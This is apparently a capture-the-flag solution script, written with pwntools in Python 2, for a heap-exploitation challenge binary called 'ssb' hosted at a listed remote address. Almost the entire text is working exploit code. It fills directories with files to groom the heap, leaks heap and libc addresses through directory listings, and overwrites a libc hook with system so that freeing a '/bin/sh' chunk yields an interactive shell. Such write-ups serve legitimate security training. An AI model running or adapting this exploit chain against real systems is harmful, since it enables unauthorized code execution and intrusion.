TSG CTF Super Smash Bros
#!/usr/bin/env python
from pwn import *
# pwntools debugger window: a horizontal tmux split (the commented alternative
# opens a fresh tmux window instead).
context(terminal=['tmux', 'splitw', '-h'])
# context(terminal=['tmux', 'new-window'])
# libc = ELF('./libc-2.27.so')
elf = ELF('./ssb')  # target binary; its architecture configures the context below
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # verbose pwntools I/O log
# Endpoints selected by the command-line option handled further down:
# 'r' connects to RHOST:RPORT, 'l' to the same service on localhost.
RHOST, RPORT = "34.85.75.40", 31000
LHOST, LPORT = "127.0.0.1", 31000
def section_addr(name, elf=elf):
    """Return the sh_addr field of ELF section *name*.

    *elf* defaults to the module-level target binary; the default is bound
    once, when this function is defined.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the module-level variable named by *ss* in hex.

    *ss* is evaluated with eval() against this module's globals, so it is
    meant for literal variable names written in this script (e.g.
    dbg('heap_addr')), not for strings received from anywhere else.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
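conn = None
# Connection mode from argv[1], popped so the remaining argv is untouched:
#   r = remote host (RHOST:RPORT), l = same service on localhost (LHOST:LPORT),
#   d = run the binary under gdb with a script, anything else = plain process;
#   'a' additionally attaches gdb after the process is started.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
# Exact match on the two endpoint modes. The previous `opt in 'rl'` was a
# substring test, so an empty argument or the string 'rl' passed it and then
# raised KeyError on the endpoint lookup.
if opt in ('r', 'l'):
    endpoints = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*endpoints[opt])
elif opt == 'd':
    # Address a `break *{}` line would receive; the script below currently has
    # no placeholder, so the formatted value is computed but not inserted.
    start = elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint
    gdbscript = """
continue
""".format(hex(start))
    conn = gdb.debug(['./ssb'], gdbscript=gdbscript)
else:
    conn = process(['./ssb'])
    # conn = process(['./ssb'], env={'LD_PRELOAD': './libc-2.27.so'})
if opt == 'a':
    gdb.attach(conn)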
def list_file():
    """Select menu option 1 at the '> ' prompt; the caller reads the output itself."""
    choice = '1'
    conn.sendlineafter('> ', choice)
def add_file(name, size, con):
    """Select menu option 2, answer the 'name:' and 'size:' prompts, then send *con*.

    *size* is sent as its decimal string form. The content is written with a
    raw send() after a very short pause, without waiting for a prompt.
    """
    answers = (('> ', '2'), ('name:', name), ('size:', str(size)))
    for prompt, reply in answers:
        conn.sendlineafter(prompt, reply)
    time.sleep(0.0001)
    conn.send(con)
def add_dir(d):
    """Select menu option 3 and answer the 'name:' prompt with *d*."""
    for prompt, reply in (('> ', '3'), ('name:', d)):
        conn.sendlineafter(prompt, reply)
def show_file(d):
    """Select menu option 4 for the entry named *d* (not used by the exploit below)."""
    MENU_SHOW = '4'
    conn.sendlineafter('> ', MENU_SHOW)
    conn.sendlineafter('name:', d)
def change(d):
    """Select menu option 5 with name *d*.

    The exploit calls this with directory names and with '..', so it is
    presumably the change-directory action; confirm against the binary's menu.
    """
    steps = [('> ', '5'), ('name:', d)]
    for prompt, reply in steps:
        conn.sendlineafter(prompt, reply)
def remove_file(d):
    """Select menu option 6 with name *d* (used below on both files and directories)."""
    MENU_REMOVE = '6'
    conn.sendlineafter('> ', MENU_REMOVE)
    conn.sendlineafter('name:', d)
# exploit
# Python 2 script: `print x` statements and str payloads concatenated with p64().
# The hard-coded sizes, offsets and pointer constants from here on are specific
# to this challenge's binary and libc build; they come from the author's
# analysis and cannot be derived from this script alone.
log.info('Pwning')
# Stage 1: create 1dir..4dir and fill each with 0x20-byte files named '<n>file'
# over consecutive ranges (5..0x3f, 0x40..0x7f, 0x80..0xbf, 0xc0..0xfe).
for i in range(4):
    add_dir(str(i+1) + 'dir')
change('1dir')
for i in range(5, 0x40):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
change('2dir')
for i in range(0x40, 0x80):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
change('3dir')
for i in range(0x80, 0xc0):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
change('4dir')
for i in range(0xc0, 0x100-1):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
# Stage 2: heap-state setup; the entry names 'x'*0x20 and 'y'*0x20 are reused
# (removed and re-added) several times below.
add_file('255file'+'a'*0x10+p64(0x71), 0x20, 'x'*0x58+'\x81'+'\n')
remove_file('1dir')
remove_file('2dir')
payload = 'y'*0x78 + p64(0x71) + 'hoge\n'
add_file('x'*0x20, 0x100, payload)
add_file('y'*0x20, 0x100, 'y'*0x20+'\n')
remove_file('x'*0x20)
add_file('x'*0x20, 0x20, 'y'*0x50+'\x01'+'hoge\n')
change('hoge')
# Read the listing back: skip past the 'x'*0x20 line, then parse six entries
# named '<n>file', accumulating the numbers big-endian into one integer.
list_file()
conn.recvuntil('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n')
heap_addr = 0
for i in range(6):
    a = int(conn.recvuntil('file').replace('file', ''))
    print a
    heap_addr = (heap_addr << 8) + a
# p64 -> reverse -> drop two bytes -> pad: net effect is that the six parsed
# values become the low six bytes of a little-endian 8-byte value, first
# value lowest.
heap_addr = u64(p64(heap_addr)[::-1][2::]+'\x00\x00')
dbg('heap_addr')
heap_base = heap_addr - 0x8280 - 0x70 - 0xa0
dbg('heap_base')
# Stage 3: repeat the setup with a 0x2000000-byte entry named 'big'.
remove_file(str(0x90)+'file')
change('..')
remove_file('x'*0x20)
add_file('x'*0x20, 0x20, 'y'*0x50+'\x02'+'hoge\n')
remove_file('hoge')
add_file('big', 0x2000000, '\n')
remove_file('x'*0x20)
add_file('x'*0x20, 0x20, 'y'*0x50+'\x01'+'big\n')
change('big')
list_file()
conn.recvuntil('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n')
libc_addr = 0
# Same six-entry parse as above, except one extra line is consumed per entry.
for i in range(6):
    a = int(conn.recvuntil('file').replace('file', ''))
    conn.recvline()
    print a
    libc_addr = (libc_addr << 8) + a
libc_addr = u64(p64(libc_addr)[::-1][2::]+'\x00\x00')
dbg('libc_addr')
libc_base = libc_addr + 0x200ff0  # NOTE: dead store, overwritten by the next line
libc_base = libc_addr + 0x2000ff0 + 0x202000
dbg('libc_base')
# Stage 4: final writes using addresses relative to libc_base.
payload = 'a'*0x78 + p64(0x71) + p64(libc_base+0x3ed8e8) + '\n'
add_file('aaaaaa', 0x100, payload)
change('..')
remove_file('3dir')
remove_file('4dir')
add_file('unko', 0x60, '/bin/sh\x00\n')
add_file('aaaaaa', 0x60, p64(libc_base+0x4f440)+'\n')
remove_file('unko')
conn.interactive()  # hand the session over to the terminal